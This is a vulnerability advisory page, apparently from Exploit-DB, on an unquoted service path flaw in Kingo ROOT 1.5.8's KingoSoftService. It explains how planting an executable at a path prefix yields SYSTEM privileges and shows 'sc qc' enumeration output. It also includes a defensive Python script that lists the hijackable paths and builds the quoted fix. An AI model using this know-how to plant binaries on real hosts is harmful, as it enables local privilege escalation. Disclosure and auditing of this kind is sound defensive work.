Vendor: Kingo ROOT
By: Anish Feroz (ZEROXINN)
CVSS: 7.5 (HIGH)
Vulnerability: Unquoted Service Path
CWE: 428
Product Name: Kingo ROOT
Affected Version From: 1.5.2008
Affected Version To: 1.5.2008
Patch Exists: NO
Related CWE:
CPE: a:kingo:root:1.5.8
Metasploit:
Other Scripts:
Platforms Tested: Windows
2023

Kingo ROOT 1.5.8 – Unquoted Service Path

Kingo ROOT 1.5.8 installs the KingoSoftService service with a binary path that contains a space and is not enclosed in quotes. Because Windows resolves such a path by trying each space-delimited prefix as an executable, an attacker who can place a malicious executable at one of those locations can have the service execute it and gain elevated privileges.

Mitigation:

To mitigate this vulnerability, the vendor should update the service configuration to include quotes around the executable path. Users should ensure they have the latest version of the software installed and keep their operating system up to date.
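An offline check for this condition, as an added example that is not part of the original advisory or of Exploit-DB's data: it parses the `sc qc` output this page records for KingoSoftService, reports the earlier paths Windows would resolve before the intended binary (the locations whose write permissions need auditing), and builds the quoted value the mitigation calls for. The function names and result layout are assumptions of this example.

```python
import re

# BINARY_PATH_NAME and neighbouring fields copied from the sc qc output on this page.
SC_QC_OUTPUT = r"""
SERVICE_NAME: KingoSoftService
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        SERVICE_START_NAME : LocalSystem
"""

def binary_path(sc_qc_text):
    """Return the raw BINARY_PATH_NAME value from `sc qc` output, or None."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", sc_qc_text, re.M)
    return m.group(1) if m else None

def split_executable(raw):
    """Split an unquoted command line into (executable, arguments) at the first .exe."""
    m = re.match(r"(.+?\.exe)(?=\s|$)(.*)", raw, re.I)
    return (m.group(1), m.group(2).strip()) if m else (raw, "")

def audit(raw):
    """Classify one BINARY_PATH_NAME value for CWE-428 (unquoted search path)."""
    if raw.lstrip().startswith('"'):
        # Already quoted: Windows takes the quoted string as the executable.
        return {"vulnerable": False, "candidates": [], "fixed": raw}
    exe, args = split_executable(raw)
    # Every space inside the executable path ends a prefix that Windows tries,
    # with .exe appended, before it reaches the intended binary.
    parts = exe.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    # Spaces that occur only in the arguments are not a finding.
    fixed = f'"{exe}"' + (f" {args}" if args else "")
    return {"vulnerable": bool(candidates), "candidates": candidates, "fixed": fixed}

if __name__ == "__main__":
    result = audit(binary_path(SC_QC_OUTPUT))
    print("unquoted path with spaces:", result["vulnerable"])
    for path in result["candidates"]:
        print("resolved before the service binary:", path)
    print("quoted value for the service configuration:", result["fixed"])
```

The same `audit` function can be run over the `BINARY_PATH_NAME` of every service collected from a host to find other services with the same weakness.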

Exploit-DB raw data:

#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path
#Date: 8/22/2023
#Exploit Author: Anish Feroz (ZEROXINN)
#Vendor Homepage: https://www.kingoapp.com/
#Software Link: https://www.kingoapp.com/android-root/download.htm
#Version: 1.5.8.3353
#Tested on: Windows 10 Pro

-------------Discovering Unquoted Path--------------

C:\Users\Anish>sc qc KingoSoftService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: KingoSoftService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : KingoSoftService
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\Anish>systeminfo

Host Name:                 DESKTOP-UT7E7CF
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045